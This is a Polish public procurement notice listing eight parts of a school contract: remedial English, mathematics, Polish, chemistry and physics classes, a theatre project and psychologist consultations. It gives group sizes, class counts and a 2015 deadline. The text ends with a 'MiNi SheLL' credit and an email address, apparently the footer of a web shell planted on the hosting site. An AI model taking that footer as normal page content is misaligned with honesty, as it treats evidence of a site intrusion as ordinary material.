<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie łącznie 156 zajęć dydaktyczno-wyrównawczych z języka angielskiego ukierunkowanych na nadrabiane zaległości, tłumaczenie zagadnień gramatycznych, utrwalenie nowego słownictwa, ćwiczenie umiejętności językowych ze słuchania, czytania, reagowania językowego oraz rozwiązywanie zadań egzaminacyjnych. 132 zajęcia zostaną przeprowadzone z użyciem tablicy interaktywnej, 24 zajęcia w sali komputerowej z wykorzystaniem programu do nauki języka. Podczas zajęć zostaną wykorzystane m. in: nowoczesne oprogramowanie, interaktywne ćwiczenia, elementy gry zabawy. Zajęcia będą prowadzone w każdym roku szkolnym w sześciu grupach. Liczebność grup: 2 grupy 5-osobowe, 4 grupy 8-osobowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nie tylko kreda i tablica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie łącznie 78 zajęć dydaktyczno-wyrównawczych z matematyki ukierunkowanych na wyrównywanie poziomu wiedzy, utrwalanie bieżącego materiału, przygotowywanie do nowej formuły egzaminu. Zajęcia będą się odbywały z wykorzystywaniem gier matematycznych, modeli figur, siatek i brył, przeprowadzaniem testów interaktywnych w pracowni komputerowej(12 zajęć). Osoba prowadząca zajęcia będzie udzielała Informacji Zwrotnej właściwej dla Oceniania Kształtującego (co uczniowie już potrafią, nad czym i w jaki sposób muszą popracować). Zajęcia będą prowadzone w każdym roku szkolnym w trzech grupach. Liczebność grup: 1 grupa 5-osobowa, 2 grupy 8-osobowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nie tylko kreda i tablica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie łącznie 78 zajęć dydaktyczno-wyrównawczych z matematyki ukierunkowanych na wyrównywanie poziomu, utrwalanie bieżącego materiału, przygotowywanie do nowej formuły egzaminu. Zajęcia będą się odbywały z wykorzystywaniem gier matematycznych, modeli figur, siatek i brył, oprogramowania, tablicy interaktywnej (39zajęć) i przeprowadzaniem testów interaktywnych w pracowni komputerowej(12 zajęć). Osoba prowadząca zajęcia będzie udzielała Informacji Zwrotnej właściwej dla Oceniania Kształtującego (co uczniowie już potrafią, nad czym i w jaki sposób muszą popracować). Zajęcia będą prowadzone w każdym roku szkolnym w trzech grupach. Liczebność grup: 1 grupa 5-osobowa, 2 grupy 8-osobowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zabawa w teatr.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie łącznie 78 zajęć dydaktyczno-wyrównawczych z języka polskiego. 12 zajęć zostanie przeprowadzonych w pracowni komputerowej (rozwiązywanie testów) a 66 zajęć będzie realizowanych w oparciu o zabawę w teatr, co daje uczniom szerokie możliwości rozwoju poprzez: czytanie tekstu ze zrozumieniem, ćwiczenia dykcyjne, interpretacyjne, kształtowanie wyobraźni, umiejętność zaprezentowania się przed publicznością (ośmielanie się), ćwiczenie dyscypliny i odpowiedzialności, pracy w grupie, dbałość o kulturę słowa, rozwijanie zainteresowań, podnoszenie własnej samooceny. Efekty pracy, będą upublicznione w postaci 6 przedstawień. Uczniowie podwyższą własną samoocenę i poczucie wartości, będą pokonywać tremę przed wystąpieniem publicznym. Zajęcia będą prowadzone w każdym roku szkolnym w trzech grupach. Liczebność grup: 1 grupa 5-osobowa, 2 grupy 8-osobowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Konsultacje/ zajęcia z psychologiem oraz poradnictwo i doradztwo edukacyjno-zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie łącznie112 zajęć z psychologiem, które będą dotyczyły: wyboru przyszłej ścieżki zawodowej (12), poszerzenia wiedzy o samym sobie i swoich wartościach, niwelowania kompleksów, wygaszania negatywnych emocji, radzenia sobie ze stresem, zwiększania akceptacji społecznej, samooceny, motywacji do działania, poszerzenia wiedzy z zakresu komunikacji interpersonalnej (100). W czasie lekcji/konsultacji uczniowie nabędą umiejętności radzenia sobie ze stresem, jak podnosić poziom samooceny, jak pokonywać stres i tremę, będą mieli świadomość wyboru przyszłej ścieżki zawodowej. Zajęcia będą prowadzone w każdym roku szkolnym w 9 grupach liczących do 24 osób. Konsultacje indywidualne będą prowadzone w zależności od zgłaszanych potrzeb..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Z chemią za pan brat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie łącznie 78 zajęć z chemii przeznaczonych dla uczniów z trudnościami dydaktycznymi, z zamiarem wyrównania przez nich braków w podstawowych wiadomościach i umiejętnościach zdobytych na lekcjach oraz utrwalania nowych. Podczas zajęć zostanie położony nacisk na wdrażanie aktywnych metod badawczych sprzyjających zdobywaniu i utrwalaniu wiedzy. Zajęcia będą prowadzone w atrakcyjnej formie, poprzez: ćwiczenia modelowe, gry dydaktyczne(5), projektowanie i przeprowadzanie doświadczeń (15), obliczenia chemiczne, przeprowadzanie testów interaktywnych w pracowni (12zajęć). Uczniowie będą badać właściwości chemiczne i fizyczne substancji, odróżniać je od siebie, sprawdzać ich aktywność chemiczną, identyfikować. Uczniowie będą rozwijać umiejętności interpersonalne, komunikowania się, będą przełamywali niechęć do nauki. Zajęcia będą prowadzone w każdym roku szkolnym w sześciu grupach. Liczebność grup: 2 grupy 5-osobowe, 4 grupy 8-osobowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Język polski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie łącznie 78 zajęć z języka polskiego, których celem będzie wyrównywanie braków w podstawowych wiadomościach wynikających z programu nauczania, przeciwdziałanie trudnościom w rozumieniu i interpretacji tekstów, motywowanie do samodzielnej, systematycznej pracy, kształcenie podstawowych umiejętności. W czasie zajęć będzie doskonalone czytanie ze zrozumieniem, technika czytania głośnego, interpretacja tekstów, umiejętności poprawnego wypowiadania się pisemnie, z uwzględnieniem zasad ortografii i interpunkcji, oraz ustnie, uczniowie będą rozwiązywali testy interakcyjne (12zajęć w pracowni). Zajęcia będą miały też za zadanie przywrócić uczniowi wiarę we własne możliwości, wskazać mu drogę dalszego rozwoju, zapobiegać niepowodzeniom szkolnym. Zajęcia będą prowadzone w każdym roku szkolnym w trzech grupach. Liczebność grup: 1 grupa 5-osobowa, 2 grupy 8-osobowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Fizyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie łącznie 78 zajęć, na których uczniowie będą wyrównywać zaległości, braki pojawiające się podczas realizacji programu nauczania fizyki. Osoba prowadząca będzie udzielała im pomocy w zakresie przyswajania i przetwarzania zdobytej wiedzy, w dokonywaniu obserwacji i wyciągania właściwych wniosków z analizowanych problemów, wykorzystywania wiedzy w praktyce do planowania i przeprowadzania eksperymentów, których zostanie przeprowadzonych 6. Uczniowie będą uczyć się jak prawidłowo posługiwać się pojęciami fizycznymi, rozwiązywać zadania, testy (w tym interakcyjne-12 zajęć w pracowni), wyjaśniać: pojęcia, prawa , zjawiska fizyczne, analizować teksty, pozyskiwać wiadomości z dostępnych źródeł. Pobudzi to ich do samodzielnego i logicznego myślenia, rozwinie w nich zdolności poznawcze, wiarę w swoje możliwości, stworzy sytuacje, w których uczeń osiągnie postępy i sukcesy w nauce. Stosowane będą różne metody aktywizujące, formy pracy, pomoce i środki dydaktyczne (między innymi będą pokazywane uczniom na ekranie zadania, schematy doświadczeń, podstawowych pojęć, zjawisk modelowych przygotowanych i zebranych do prezentacji za pomocą komputera). Zajęcia będą prowadzone w każdym roku szkolnym w sześciu grupach. Liczebność grup: 2 grupy 5-osobowe, 4 grupy 8-osobowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com